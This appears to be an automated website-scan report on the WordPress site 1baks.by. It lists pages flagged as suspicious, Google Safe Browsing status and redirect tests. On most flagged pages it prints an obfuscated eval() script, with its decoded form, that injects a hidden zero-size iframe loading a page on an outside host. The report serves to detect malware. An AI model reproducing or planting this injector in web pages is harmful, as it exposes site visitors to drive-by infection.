Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1baks.by
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://1baks.by/ | 200 OK Content-Length: 21319 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" d=\\"0\\" h=\\"0\\" g=\\"0\\" f=\\"6://6://i.m.j/n.l\\">";1 5="<9";1 8="o";1 4="e";1 b="</9";1 a="e>";2.3(5);c(2.3(8+4+k+b),7);c(2.3(4+a),7);',25,25,'|var|document|write|k02|k0|http|1000|k01|if|k22|k2|setTimeout|width||src|board|height|aventour|ar||php|tur|index2|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://http://aventour.tur.ar/index2.php"></ifee> | ||
http://1baks.by/wp-content/themes/onetone/js/jquery.smint.js?ver=2.0 | 200 OK Content-Length: 6467 Content-Type: application/javascript | clean |
http://1baks.by/wp-content/themes/onetone/js/jquery.tubular.1.0.js?ver=1.0 | 200 OK Content-Length: 6255 Content-Type: application/javascript | clean |
http://1baks.by/wp-content/themes/onetone/js/onetone.js?ver=1.1.4 | 200 OK Content-Length: 6266 Content-Type: application/javascript | clean |
http://1baks.by/animatciia | 200 OK Content-Length: 44854 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" d=\\"0\\" h=\\"0\\" g=\\"0\\" f=\\"6://6://i.m.j/n.l\\">";1 5="<9";1 8="o";1 4="e";1 b="</9";1 a="e>";2.3(5);c(2.3(8+4+k+b),7);c(2.3(4+a),7);',25,25,'|var|document|write|k02|k0|http|1000|k01|if|k22|k2|setTimeout|width||src|board|height|aventour|ar||php|tur|index2|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://http://aventour.tur.ar/index2.php"></ifee> | ||
http://1baks.by/test404page.js | 404 Not Found Content-Length: 21074 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" d=\\"0\\" h=\\"0\\" g=\\"0\\" f=\\"6://6://i.m.j/n.l\\">";1 5="<9";1 8="o";1 4="e";1 b="</9";1 a="e>";2.3(5);c(2.3(8+4+k+b),7);c(2.3(4+a),7);',25,25,'|var|document|write|k02|k0|http|1000|k01|if|k22|k2|setTimeout|width||src|board|height|aventour|ar||php|tur|index2|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://http://aventour.tur.ar/index2.php"></ifee> | ||
http://1baks.by/lode | 200 OK Content-Length: 35860 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" d=\\"0\\" h=\\"0\\" g=\\"0\\" f=\\"6://6://i.m.j/n.l\\">";1 5="<9";1 8="o";1 4="e";1 b="</9";1 a="e>";2.3(5);c(2.3(8+4+k+b),7);c(2.3(4+a),7);',25,25,'|var|document|write|k02|k0|http|1000|k01|if|k22|k2|setTimeout|width||src|board|height|aventour|ar||php|tur|index2|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://http://aventour.tur.ar/index2.php"></ifee> | ||
http://1baks.by/lode/217-pansionat-lode.html | 200 OK Content-Length: 39991 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" d=\\"0\\" h=\\"0\\" g=\\"0\\" f=\\"6://6://i.m.j/n.l\\">";1 5="<9";1 8="o";1 4="e";1 b="</9";1 a="e>";2.3(5);c(2.3(8+4+k+b),7);c(2.3(4+a),7);',25,25,'|var|document|write|k02|k0|http|1000|k01|if|k22|k2|setTimeout|width||src|board|height|aventour|ar||php|tur|index2|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://http://aventour.tur.ar/index2.php"></ifee> | ||
http://1baks.by/wp-includes/js/comment-reply.min.js?ver=4.0.1 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://1baks.by/animatciia/62-nebiznes-lager-na-vse-4-storony-2014.html | 200 OK Content-Length: 41808 Content-Type: text/html | suspicious |
Suspicious code found </span> Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://http://aventour.tur.ar/index2.php"></ifee> | ||
http://1baks.by/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://1baks.by/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://1baks.by/wp-content/themes/onetone/js/modernizr.custom.js?ver=2.8.2 | 200 OK Content-Length: 29342 Content-Type: application/javascript | clean |
http://1baks.by/754-2 | 200 OK Content-Length: 24774 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" d=\\"0\\" h=\\"0\\" g=\\"0\\" f=\\"6://6://i.m.j/n.l\\">";1 5="<9";1 8="o";1 4="e";1 b="</9";1 a="e>";2.3(5);c(2.3(8+4+k+b),7);c(2.3(4+a),7);',25,25,'|var|document|write|k02|k0|http|1000|k01|if|k22|k2|setTimeout|width||src|board|height|aventour|ar||php|tur|index2|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://http://aventour.tur.ar/index2.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://http://aventour.tur.ar/index2.php"></ifee> | ||
http://1baks.by/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.15.0 | 200 OK Content-Length: 76151 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 1baks.by
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Dec 2014 05:52:11 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1baks.by/xmlrpc.php
GET / HTTP/1.1
Host: 1baks.by
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Dec 2014 05:52:11 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1baks.by/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1baks.by
Referer: http://www.google.com/search?q=1baks.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 1baks.by
Referer: http://www.google.com/search?q=1baks.by
Result:
The result is similar to the first query. There are no suspicious redirects found.